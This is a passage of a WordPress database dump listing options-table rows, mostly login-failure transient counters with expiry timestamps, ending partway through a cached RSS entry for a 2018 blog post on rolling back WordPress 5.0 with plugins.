(113884, '_transient_timeout_wflginfl_1768542757', '1494746978', 'no'),
(113885, '_transient_wflginfl_1768542757', '1', 'no'),
(113906, '_transient_wflginfl_778399303', '1', 'no'),
(119244, '_transient_timeout_wflginfl_1732504330', '1499297609', 'no'),
(119245, '_transient_wflginfl_1732504330', '10', 'no'),
(116304, '_transient_timeout_wflginfl_762807321', '1497644056', 'no'),
(116305, '_transient_wflginfl_762807321', '2', 'no'),
(114373, '_transient_wflginfl_1168360410', '1', 'no'),
(114285, '_transient_timeout_wflginfl_1053969232', '1495274047', 'no'),
(114286, '_transient_wflginfl_1053969232', '1', 'no'),
(114305, '_transient_timeout_wflginfl_3056768804', '1495285738', 'no'),
(114306, '_transient_wflginfl_3056768804', '1', 'no'),
(114855, '_transient_timeout_wflginfl_1729627112', '1495925978', 'no'),
(114856, '_transient_wflginfl_1729627112', '1', 'no'),
(114470, '_transient_timeout_wflginfl_1936861289', '1495504376', 'no'),
(114009, '_transient_wflginfl_872392488', '1', 'no'),
(113957, '_transient_wflginfl_3017001352', '1', 'no'),
(114287, '_transient_timeout_wflginfl_1079652533', '1495274632', 'no'),
(114288, '_transient_wflginfl_1079652533', '1', 'no'),
(114008, '_transient_timeout_wflginfl_872392488', '1494899735', 'no'),
(114093, '_transient_timeout_wflginfl_2970865452', '1494988913', 'no'),
(114705, '_transient_timeout_wflginfl_1941604657', '1495826662', 'no'),
(114362, '_transient_wflginfl_3497114222', '1', 'no'),
(118187, '_transient_timeout_wflginfl_3105930270', '1498704602', 'no'),
(118188, '_transient_wflginfl_3105930270', '1', 'no'),
(114365, '_transient_timeout_wflginfl_3476728705', '1495376857', 'no'),
(114366, '_transient_wflginfl_3476728705', '1', 'no'),
(114370, '_transient_timeout_wflginfl_3280140082', '1495377212', 'no'),
(114371, '_transient_wflginfl_3280140082', '1', 'no'),
(114988, '_transient_timeout_wflginfl_3586257058', '1496028667', 'no'),
(114989, '_transient_wflginfl_3586257058', '1', 'no'),
(115323, '_transient_timeout_wflginfl_1741512757', '1496477422', 'no'),
(115324, '_transient_wflginfl_1741512757', '1', 'no'),
(114407, '_transient_timeout_wflginfl_531267501', '1495424037', 'no'),
(114408, '_transient_wflginfl_531267501', '5', 'no'),
(114448, '_transient_timeout_wflginfl_3237921028', '1495486353', 'no'),
(114449, '_transient_wflginfl_3237921028', '1', 'no'),
(114553, '_transient_wflginfl_1600667046', '1', 'no'),
(114521, '_transient_wflginfl_842965149', '1', 'no'),
(114670, '_transient_timeout_wflginfl_1401863434', '1495798450', 'no'),
(114671, '_transient_wflginfl_1401863434', '1', 'no'),
(114770, '_transient_timeout_wflginfl_1042038966', '1495867332', 'no'),
(114771, '_transient_wflginfl_1042038966', '1', 'no'),
(114784, '_transient_timeout_wflginfl_3170385964', '1495878278', 'no'),
(114785, '_transient_wflginfl_3170385964', '1', 'no'),
(114683, '_transient_timeout_wflginfl_3735412901', '1495809632', 'no'),
(114684, '_transient_wflginfl_3735412901', '1', 'no'),
(118788, '_transient_timeout_wflginfl_998235371', '1499082177', 'no'),
(118789, '_transient_wflginfl_998235371', '1', 'no'),
(114696, '_transient_timeout_wflginfl_1845364905', '1495820454', 'no'),
(114697, '_transient_wflginfl_1845364905', '1', 'no'),
(115476, '_transient_timeout_wflginfl_3489067105', '1496663839', 'no'),
(115477, '_transient_wflginfl_3489067105', '19', 'no'),
(114706, '_transient_wflginfl_1941604657', '1', 'no'),
(118810, '_transient_timeout_wflginfl_1828828346', '1499090055', 'no'),
(118811, '_transient_wflginfl_1828828346', '1', 'no'),
(114645, '_transient_timeout_wflginfl_783839564', '1495786006', 'no'),
(114646, '_transient_wflginfl_783839564', '1', 'no'),
(114712, '_transient_wflginfl_2945407100', '1', 'no'),
(114471, '_transient_wflginfl_1936861289', '1', 'no'),
(115534, '_transient_timeout_wflginfl_3163163411', '1496723696', 'no'),
(115535, '_transient_wflginfl_3163163411', '1', 'no'),
(114520, '_transient_timeout_wflginfl_842965149', '1495597594', 'no'),
(115421, '_transient_timeout_wflginfl_3635199372', '1496613549', 'no'),
(115422, '_transient_wflginfl_3635199372', '10', 'no'),
(114526, '_transient_timeout_wflginfl_842969123', '1495598971', 'no'),
(114527, '_transient_wflginfl_842969123', '1', 'no'),
(114533, '_transient_timeout_wflginfl_3590043248', '1495601044', 'no'),
(114534, '_transient_wflginfl_3590043248', '1', 'no'),
(114535, '_transient_timeout_wflginfl_3242600154', '1495601611', 'no'),
(114536, '_transient_wflginfl_3242600154', '1', 'no'),
(114906, '_transient_timeout_wflginfl_3254658598', '1495966143', 'no'),
(114907, '_transient_wflginfl_3254658598', '1', 'no'),
(114552, '_transient_timeout_wflginfl_1600667046', '1495638275', 'no'),
(114588, '_transient_timeout_wflginfl_1760853483', '1495702224', 'no'),
(114589, '_transient_wflginfl_1760853483', '1', 'no'),
(118772, '_transient_timeout_wflginfl_1534992972', '1499077475', 'no'),
(118773, '_transient_wflginfl_1534992972', '1', 'no'),
(115685, '_transient_wflginfl_1601092177', '1', 'no'),
(115668, '_transient_timeout_wflginfl_2065606982', '1496919088', 'no'),
(115413, '_transient_timeout_wflginfl_1707700163', '1496611912', 'no'),
(115414, '_transient_wflginfl_1707700163', '1', 'no'),
(115249, '_transient_timeout_wflginfl_1266634707', '1496369824', 'no'),
(115250, '_transient_wflginfl_1266634707', '1', 'no'),
(115537, '_transient_wflginfl_2014968716', '1', 'no'),
(115559, '_transient_timeout_wflginfl_3132510964', '1496767498', 'no'),
(115560, '_transient_wflginfl_3132510964', '1', 'no'),
(117013, '_transient_timeout_wflginfl_1053979479', '1498030146', 'no'),
(117014, '_transient_wflginfl_1053979479', '1', 'no'),
(118898, '_transient_timeout_wflginfl_2745977144', '1499129531', 'no'),
(118899, '_transient_wflginfl_2745977144', '1', 'no'),
(115619, '_transient_timeout_wflginfl_3741061572', '1496845495', 'no'),
(115620, '_transient_wflginfl_3741061572', '1', 'no'),
(115079, '_transient_timeout_wflginfl_2734175325', '1496139980', 'no'),
(115080, '_transient_wflginfl_2734175325', '1', 'no'),
(115144, '_transient_timeout_wflginfl_2978476462', '1496244480', 'no'),
(115145, '_transient_wflginfl_2978476462', '1', 'no'),
(115150, '_transient_timeout_wflginfl_842969491', '1496251947', 'no'),
(115151, '_transient_wflginfl_842969491', '10', 'no'),
(114901, '_transient_timeout_wflginfl_1563679021', '1495964120', 'no'),
(114902, '_transient_wflginfl_1563679021', '1', 'no'),
(114816, '_transient_timeout_wflginfl_2949647692', '1495906593', 'no'),
(114817, '_transient_wflginfl_2949647692', '1', 'no'),
(118636, '_transient_wflginfl_1046956164', '1', 'no'),
(114711, '_transient_timeout_wflginfl_2945407100', '1495830886', 'no'),
(114863, '_transient_wflginfl_3387838170', '1', 'no'),
(114957, '_transient_timeout_wflginfl_781668949', '1495999927', 'no'),
(114958, '_transient_wflginfl_781668949', '1', 'no'),
(114728, '_transient_timeout_wflginfl_1495116718', '1495839448', 'no'),
(114729, '_transient_wflginfl_1495116718', '1', 'no'),
(118635, '_transient_timeout_wflginfl_1046956164', '1499024261', 'no'),
(114756, '_transient_timeout_wflginfl_783835753', '1495854104', 'no'),
(114757, '_transient_wflginfl_783835753', '1', 'no'),
(114829, '_transient_timeout_wflginfl_529855267', '1495916827', 'no'),
(114830, '_transient_wflginfl_529855267', '1', 'no'),
(114842, '_transient_wflginfl_2548839223', '3', 'no'),
(114833, '_transient_timeout_wflginfl_3254658391', '1495918855', 'no'),
(118417, '_transient_timeout_wflginfl_1835212154', '1498944556', 'no'),
(118418, '_transient_wflginfl_1835212154', '1', 'no'),
(114826, '_transient_timeout_wflginfl_2156323210', '1495914881', 'no'),
(114827, '_transient_wflginfl_2156323210', '1', 'no'),
(118518, '_transient_timeout_wflginfl_3151105913', '1498980604', 'no'),
(118519, '_transient_wflginfl_3151105913', '1', 'no'),
(114867, '_transient_timeout_wflginfl_3254658403', '1495932791', 'no'),
(114868, '_transient_wflginfl_3254658403', '1', 'no'),
(118544, '_transient_timeout_wflginfl_1835212158', '1498990634', 'no'),
(118545, '_transient_wflginfl_1835212158', '1', 'no'),
(114823, '_transient_timeout_wflginfl_3107039490', '1495910742', 'no'),
(114824, '_transient_wflginfl_3107039490', '1', 'no'),
(114834, '_transient_wflginfl_3254658391', '1', 'no'),
(114836, '_transient_timeout_wflginfl_1345746571', '1495920848', 'no'),
(114837, '_transient_wflginfl_1345746571', '1', 'no'),
(115072, '_transient_timeout_wflginfl_3555103830', '1496139487', 'no'),
(114841, '_transient_timeout_wflginfl_2548839223', '1495924637', 'no'),
(115073, '_transient_wflginfl_3555103830', '10', 'no'),
(114853, '_transient_timeout_wflginfl_3168080791', '1495925649', 'no'),
(114854, '_transient_wflginfl_3168080791', '1', 'no'),
(114945, '_transient_timeout_wflginfl_1501163646', '1495990188', 'no'),
(114884, '_transient_timeout_wflginfl_3415089988', '1495947396', 'no'),
(114885, '_transient_wflginfl_3415089988', '1', 'no'),
(114916, '_transient_timeout_wflginfl_3254658395', '1495972223', 'no'),
(114897, '_transient_timeout_wflginfl_1424919935', '1495959776', 'no'),
(114898, '_transient_wflginfl_1424919935', '1', 'no'),
(114917, '_transient_wflginfl_3254658395', '1', 'no'),
(118377, '_transient_timeout_wflginfl_1835211794', '1498929744', 'no'),
(118378, '_transient_wflginfl_1835211794', '1', 'no'),
(114926, '_transient_timeout_wflginfl_48857242', '1495980469', 'no'),
(114927, '_transient_wflginfl_48857242', '1', 'no'),
(114931, '_transient_timeout_wflginfl_1342920287', '1495982466', 'no'),
(114932, '_transient_wflginfl_1342920287', '1', 'no'),
(114940, '_transient_timeout_wflginfl_786077451', '1495988335', 'no'),
(114941, '_transient_wflginfl_786077451', '1', 'no'),
(114946, '_transient_wflginfl_1501163646', '1', 'no'),
(114947, '_transient_timeout_wflginfl_1489572659', '1495990711', 'no'),
(114948, '_transient_wflginfl_1489572659', '1', 'no'),
(114954, '_transient_timeout_wflginfl_529854975', '1495993918', 'no'),
(114955, '_transient_wflginfl_529854975', '1', 'no'),
(114986, '_transient_timeout_wflginfl_2032732065', '1496029593', 'no'),
(114987, '_transient_wflginfl_2032732065', '2', 'no'),
(117759, '_transient_timeout_wflginfl_3682725338', '1498595220', 'no'),
(117760, '_transient_wflginfl_3682725338', '18', 'no'),
(115682, '_transient_timeout_wflginfl_1566171412', '1496933594', 'no'),
(115683, '_transient_wflginfl_1566171412', '10', 'no'),
(115343, '_transient_timeout_wflginfl_1539836946', '1496498193', 'no'),
(114991, '_transient_timeout_wflginfl_700515628', '1496028917', 'no'),
(114992, '_transient_wflginfl_700515628', '1', 'no'),
(114998, '_transient_timeout_wflginfl_1539837113', '1496030805', 'no'),
(114999, '_transient_wflginfl_1539837113', '19', 'no'),
(116287, '_transient_wflginfl_1332036734', '2', 'no'),
(115599, '_transient_timeout_wflginfl_96963116', '1496822211', 'no'),
(115600, '_transient_wflginfl_96963116', '19', 'no'),
(115344, '_transient_wflginfl_1539836946', '1', 'no'),
(115346, '_transient_timeout_wflginfl_2249451223', '1496500929', 'no'),
(115347, '_transient_wflginfl_2249451223', '1', 'no'),
(115377, '_transient_timeout_wflginfl_1539837082', '1496540007', 'no'),
(115378, '_transient_wflginfl_1539837082', '5', 'no'),
(115417, '_transient_timeout_wflginfl_874456664', '1496612337', 'no'),
(115418, '_transient_wflginfl_874456664', '1', 'no'),
(115536, '_transient_timeout_wflginfl_2014968716', '1496726002', 'no'),
(115426, '_transient_timeout_wflginfl_3326602014', '1496614015', 'no'),
(115427, '_transient_wflginfl_3326602014', '10', 'no'),
(115669, '_transient_wflginfl_2065606982', '1', 'no'),
(115430, '_transient_timeout_wflginfl_1307193800', '1496614686', 'no'),
(115431, '_transient_wflginfl_1307193800', '1', 'no'),
(115580, '_transient_timeout_wflginfl_1168352192', '1496793054', 'no'),
(115581, '_transient_wflginfl_1168352192', '19', 'no'),
(115606, '_transient_timeout_wflginfl_1109513350', '1496825335', 'no'),
(115607, '_transient_wflginfl_1109513350', '1', 'no'),
(115531, '_transient_timeout_wflginfl_1984277895', '1496722991', 'no'),
(115532, '_transient_wflginfl_1984277895', '1', 'no'),
(115527, '_transient_timeout_wflginfl_788319630', '1496721485', 'no'),
(115528, '_transient_wflginfl_788319630', '1', 'no'),
(117037, '_transient_wflginfl_3155022212', '1', 'no'),
(117038, '_transient_timeout_wflginfl_3162614869', '1498042058', 'no'),
(117039, '_transient_wflginfl_3162614869', '1', 'no'),
(117040, '_transient_timeout_wflginfl_832017728', '1498042080', 'no'),
(117041, '_transient_wflginfl_832017728', '1', 'no'),
(117042, '_transient_timeout_wflginfl_1187187367', '1498043911', 'no'),
(115684, '_transient_timeout_wflginfl_1601092177', '1496934172', 'no'),
(115736, '_transient_timeout_wflginfl_136172254', '1497030784', 'no'),
(115737, '_transient_wflginfl_136172254', '19', 'no'),
(115763, '_transient_timeout_wflginfl_1985724027', '1497069978', 'no'),
(115764, '_transient_wflginfl_1985724027', '1', 'no'),
(115857, '_transient_timeout_wflginfl_1840808480', '1497206685', 'no'),
(115858, '_transient_wflginfl_1840808480', '19', 'no'),
(115822, '_transient_timeout_wflginfl_1732504327', '1497159791', 'no'),
(115823, '_transient_wflginfl_1732504327', '9', 'no'),
(115862, '_transient_timeout_wflginfl_2032808987', '1497211723', 'no'),
(115863, '_transient_wflginfl_2032808987', '19', 'no'),
(115876, '_transient_timeout_wflginfl_3308102131', '1497227121', 'no'),
(115877, '_transient_wflginfl_3308102131', '1', 'no'),
(116286, '_transient_timeout_wflginfl_1332036734', '1497625145', 'no'),
(116276, '_transient_timeout_wflginfl_1476942175', '1497613974', 'no'),
(116277, '_transient_wflginfl_1476942175', '1', 'no'),
(116099, '_transient_wflginfl_2006647068', '2', 'no'),
(117337, '_transient_timeout_wflginfl_1547655939', '1498211760', 'no'),
(116058, '_transient_wflginfl_1731536960', '10', 'no'),
(117338, '_transient_wflginfl_1547655939', '1', 'no'),
(116098, '_transient_timeout_wflginfl_2006647068', '1497518408', 'no'),
(116055, '_transient_timeout_wflginfl_3233382727', '1497483761', 'no'),
(116056, '_transient_wflginfl_3233382727', '3', 'no'),
(116057, '_transient_timeout_wflginfl_1731536960', '1497484562', 'no'),
(116059, '_transient_timeout_wflginfl_2037512030', '1497484714', 'no'),
(116060, '_transient_wflginfl_2037512030', '1', 'no'),
(116061, '_transient_timeout_wflginfl_2966208612', '1497485794', 'no'),
(116062, '_transient_wflginfl_2966208612', '2', 'no'),
(116063, '_transient_timeout_wflginfl_842965026', '1497485994', 'no'),
(116064, '_transient_wflginfl_842965026', '1', 'no'),
(116069, '_transient_timeout_wflginfl_528486593', '1497493143', 'no'),
(116070, '_transient_wflginfl_528486593', '1', 'no'),
(116071, '_transient_timeout_wflginfl_1288492650', '1497493853', 'no'),
(116072, '_transient_wflginfl_1288492650', '2', 'no'),
(116076, '_transient_timeout_wflginfl_3386002506', '1497496287', 'no'),
(116077, '_transient_wflginfl_3386002506', '1', 'no'),
(116078, '_transient_timeout_wflginfl_1053979353', '1497497524', 'no'),
(116079, '_transient_wflginfl_1053979353', '1', 'no'),
(116090, '_transient_timeout_wflginfl_2996386590', '1497509164', 'no'),
(116091, '_transient_wflginfl_2996386590', '2', 'no'),
(116096, '_transient_timeout_wflginfl_3231737508', '1497516317', 'no'),
(116097, '_transient_wflginfl_3231737508', '1', 'no'),
(116117, '_transient_timeout_wflginfl_1741028094', '1497529039', 'no'),
(116105, '_transient_timeout_wflginfl_1741681534', '1497521348', 'no'),
(116106, '_transient_wflginfl_1741681534', '1', 'no'),
(116118, '_transient_wflginfl_1741028094', '2', 'no'),
(116285, '_transient_wflginfl_2192896078', '1', 'no'),
(116122, '_transient_timeout_wflginfl_2536930801', '1497533367', 'no'),
(116123, '_transient_wflginfl_2536930801', '2', 'no'),
(116127, '_transient_timeout_wflginfl_1856543098', '1497535916', 'no'),
(116128, '_transient_wflginfl_1856543098', '2', 'no'),
(116129, '_transient_timeout_wflginfl_1300190727', '1497536069', 'no'),
(116130, '_transient_wflginfl_1300190727', '2', 'no'),
(116131, '_transient_timeout_wflginfl_3680243857', '1497536359', 'no'),
(116132, '_transient_wflginfl_3680243857', '2', 'no'),
(116133, '_transient_timeout_wflginfl_1697806700', '1497536732', 'no'),
(116134, '_transient_wflginfl_1697806700', '2', 'no'),
(116135, '_transient_timeout_wflginfl_3240197617', '1497537080', 'no'),
(116136, '_transient_wflginfl_3240197617', '2', 'no'),
(116138, '_transient_timeout_wflginfl_3115241646', '1497538134', 'no'),
(116139, '_transient_wflginfl_3115241646', '2', 'no'),
(116140, '_transient_timeout_wflginfl_1814215517', '1497540619', 'no'),
(116141, '_transient_wflginfl_1814215517', '1', 'no'),
(116145, '_transient_timeout_wflginfl_1327015571', '1497540959', 'no'),
(116146, '_transient_wflginfl_1327015571', '2', 'no'),
(116147, '_transient_timeout_wflginfl_2945164872', '1497542517', 'no'),
(116148, '_transient_wflginfl_2945164872', '2', 'no'),
(116152, '_transient_timeout_wflginfl_1332374912', '1497545520', 'no'),
(116153, '_transient_wflginfl_1332374912', '2', 'no'),
(116157, '_transient_timeout_wflginfl_1868300323', '1497549274', 'no'),
(116158, '_transient_wflginfl_1868300323', '1', 'no'),
(116159, '_transient_timeout_wflginfl_831894783', '1497549813', 'no'),
(116160, '_transient_wflginfl_831894783', '2', 'no'),
(116185, '_transient_wflginfl_3631648402', '2', 'no'),
(116161, '_transient_timeout_wflginfl_3081917928', '1497551093', 'no'),
(116162, '_transient_wflginfl_3081917928', '2', 'no'),
(116182, '_transient_timeout_wflginfl_1837047866', '1497560330', 'no'),
(116168, '_transient_timeout_wflginfl_1310564959', '1497557672', 'no'),
(116169, '_transient_wflginfl_1310564959', '2', 'no'),
(116170, '_transient_timeout_wflginfl_1544579148', '1497557961', 'no'),
(116171, '_transient_wflginfl_1544579148', '2', 'no'),
(116172, '_transient_timeout_wflginfl_3743340614', '1497558079', 'no'),
(116173, '_transient_wflginfl_3743340614', '1', 'no'),
(116174, '_transient_timeout_wflginfl_3065291823', '1497558123', 'no'),
(116175, '_transient_wflginfl_3065291823', '2', 'no'),
(116176, '_transient_timeout_wflginfl_1833145697', '1497558171', 'no'),
(116177, '_transient_wflginfl_1833145697', '1', 'no'),
(116178, '_transient_timeout_wflginfl_3168543257', '1497558604', 'no'),
(116179, '_transient_wflginfl_3168543257', '2', 'no'),
(116183, '_transient_wflginfl_1837047866', '2', 'no'),
(116184, '_transient_timeout_wflginfl_3631648402', '1497561280', 'no'),
(116189, '_transient_timeout_wflginfl_1454326002', '1497562774', 'no'),
(116190, '_transient_wflginfl_1454326002', '2', 'no'),
(116200, '_transient_timeout_wflginfl_693797103', '1497568420', 'no'),
(116194, '_transient_timeout_wflginfl_2996915206', '1497565581', 'no'),
(116195, '_transient_wflginfl_2996915206', '1', 'no'),
(116201, '_transient_wflginfl_693797103', '2', 'no'),
(116207, '_transient_timeout_wflginfl_831675222', '1497570337', 'no'),
(116208, '_transient_wflginfl_831675222', '2', 'no'),
(116209, '_transient_timeout_wflginfl_1486676647', '1497570857', 'no'),
(116210, '_transient_wflginfl_1486676647', '2', 'no'),
(116211, '_transient_timeout_wflginfl_1309966181', '1497571106', 'no'),
(116212, '_transient_wflginfl_1309966181', '2', 'no'),
(116216, '_transient_timeout_wflginfl_1602769142', '1497574717', 'no'),
(116217, '_transient_wflginfl_1602769142', '2', 'no'),
(116255, '_transient_wflginfl_2054111803', '2', 'no'),
(116222, '_transient_timeout_wflginfl_532244500', '1497582940', 'no'),
(116223, '_transient_wflginfl_532244500', '1', 'no'),
(116224, '_transient_timeout_wflginfl_1730727519', '1497583715', 'no'),
(116225, '_transient_wflginfl_1730727519', '2', 'no'),
(116227, '_transient_timeout_wflginfl_3583324972', '1497584448', 'no'),
(116228, '_transient_wflginfl_3583324972', '1', 'no'),
(116229, '_transient_timeout_wflginfl_3098024864', '1497584469', 'no'),
(116230, '_transient_wflginfl_3098024864', '10', 'no'),
(116231, '_transient_timeout_wflginfl_872399819', '1497585080', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(116232, '_transient_wflginfl_872399819', '10', 'no'),
(116233, '_transient_timeout_wflginfl_1892867061', '1497586890', 'no'),
(116234, '_transient_wflginfl_1892867061', '1', 'no'),
(116239, '_transient_timeout_wflginfl_1768366811', '1497593272', 'no'),
(116240, '_transient_wflginfl_1768366811', '2', 'no'),
(116249, '_transient_timeout_wflginfl_1416429771', '1497601621', 'no'),
(116250, '_transient_wflginfl_1416429771', '2', 'no'),
(116252, '_transient_timeout_wflginfl_2050666736', '1497602764', 'no'),
(116253, '_transient_wflginfl_2050666736', '1', 'no'),
(116254, '_transient_timeout_wflginfl_2054111803', '1497603052', 'no'),
(116923, '_transient_wflginfl_3000964923', '2', 'no'),
(116266, '_transient_timeout_wflginfl_2083198645', '1497608406', 'no'),
(116267, '_transient_wflginfl_2083198645', '2', 'no'),
(116268, '_transient_timeout_wflginfl_2588096105', '1497608675', 'no'),
(116269, '_transient_wflginfl_2588096105', '2', 'no'),
(121412, '_transient_timeout_wflginfl_3410419836', '1500425435', 'no'),
(121413, '_transient_wflginfl_3410419836', '1', 'no'),
(121414, '_transient_timeout_wflginfl_1503345003', '1500426055', 'no'),
(118305, '_transient_timeout_wflginfl_1776434590', '1498897667', 'no'),
(117753, '_transient_wflginfl_2637301790', '2', 'no'),
(116994, '_transient_timeout_wflginfl_1358088689', '1498013869', 'no'),
(116284, '_transient_timeout_wflginfl_2192896078', '1497625049', 'no'),
(116377, '_transient_timeout_wflginfl_3032436716', '1497677023', 'no'),
(116292, '_transient_timeout_wflginfl_3111507721', '1497632467', 'no'),
(116293, '_transient_wflginfl_3111507721', '1', 'no'),
(116308, '_transient_timeout_wflginfl_3389598256', '1497646722', 'no'),
(116309, '_transient_wflginfl_3389598256', '2', 'no'),
(124431, '_transient_timeout_rss_da8c757f762dcd1ec67339593414ea85', '1566837824', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(124432, '_transient_rss_da8c757f762dcd1ec67339593414ea85', 'O:9:\"MagpieRSS\":19:{s:6:\"parser\";i:0;s:12:\"current_item\";a:0:{}s:5:\"items\";a:10:{i:0;a:11:{s:5:\"title\";s:72:\"How to Rollback WordPress 5.0 (A Just in Case You Weren’t Ready Guide)\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/mFkgcZIy4CM/\";s:8:\"category\";s:25:\"How To Reference Material\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 12 Dec 2018 09:51:56 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9690\";s:7:\"content\";a:1:{s:7:\"encoded\";s:5878:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Ok, so, you&#8217;ve heard the chatter about this <a href=\"https://wordpress.org/plugins/gutenberg/\">Gutenberg thing</a> from WordPress for the last 6 months or so, and sometimes life just gets in the way and things can take you by surprise, but an WP update shouldn&#8217;t be one of them.</p>\n<p>So, just in case this happened to you, don&#8217;t panic, here&#8217;s a quick guide on how you can rollback WordPress with a few simple plugins and make all the headaches of broken themes and plugins go away&#8230;</p>\n<p>While this is just a temporary fix (as you can&#8217;t put off updating indefinitely) but this can give you and theme and plugin developers a chance to catch up and patch things to be more stable as any WP core update can potentially wreak havoc.</p>\n<p>Anyway, here&#8217;s a quick fix:</p></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/WP-Downgrade-Plugin.jpg\" class=\"image-module img-responsive img-center\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/WP-Downgrade-Plugin.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Step 1) Download the <strong>WP Downgrade Plugin</strong> &#8211; You can find it here &#8211; <a href=\"https://wordpress.org/plugins/wp-downgrade/\">https://wordpress.org/plugins/wp-downgrade/</a></p>\n<p>Step 2) <strong>Install and Activate the Plugin</strong> &gt; Then go to <strong>Settings</strong> &gt; <strong>WP-Downgrade</strong> &gt; then <strong>Enter the version you&#8217;d like to rollback to</strong> &gt; for example I used 4.9.8</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/wp-downgrade-settings-1024x386.jpg\" class=\"image-module img-responsive img-left\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/wp-downgrade-settings-1024x386.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Step 3) <strong>Save changes</strong> and then <strong>click the link to upgrade your WP Core</strong>, then it should have the version you entered and successfully rollback changes (just like you&#8217;d update to a newer version from WP).</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/easy-updates-manager-plugin-1010x640.jpg\" class=\"image-module img-responsive rectangle img-left\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/easy-updates-manager-plugin-1010x640.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">If you want to stop or disable auto-updates entirely, you can add this plugin from &#8211; <a href=\"https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/\">https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/</a></p>\n<p>Just <strong>Download, Install and Activate Plugin</strong> &gt; Then go to <strong>Updates Options</strong> &gt; in sidebar &gt; right under updates &gt; Then click <strong>Disable Updates</strong> and <strong>Save Changes </strong>&gt;</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/disable-updates-option-1200x640.jpg\" class=\"image-module img-responsive rectangle img-left\" data-no-retina title=\"\" alt=\"\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2018/12/disable-updates-option-1200x640.jpg\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">Problem solved.</p>\n<p>There&#8217;s also a plugin you can use if you just want to disable the Gutenberg editor and revert to the <a href=\"https://wordpress.org/plugins/classic-editor/\">WP classic editor</a> that you can learn about here &#8211; <a href=\"https://gogutenberg.com/disable-gutenberg/\">https://gogutenberg.com/disable-gutenberg/</a></p>\n<p>Enjoy!</p>\n<p>Jeffrey</p></div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=mFkgcZIy4CM:279NYzft6Nw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/mFkgcZIy4CM\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:492:\"Ok, so, you&#8217;ve heard the chatter about this Gutenberg thing from WordPress for the last 6 months or so, and sometimes life just gets in the way and things can take you by surprise, but an WP update shouldn&#8217;t be one of them. So, just in case this happened to you, don&#8217;t panic, here&#8217;s a <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-rollback-wordpress-5-0-a-just-in-case-you-werent-ready-guide/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:133:\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-rollback-wordpress-5-0-a-just-in-case-you-werent-ready-guide/\";}s:7:\"summary\";s:492:\"Ok, so, you&#8217;ve heard the chatter about this Gutenberg thing from WordPress for the last 6 months or so, and sometimes life just gets in the way and things can take you by surprise, but an WP update shouldn&#8217;t be one of them. So, just in case this happened to you, don&#8217;t panic, here&#8217;s a <a 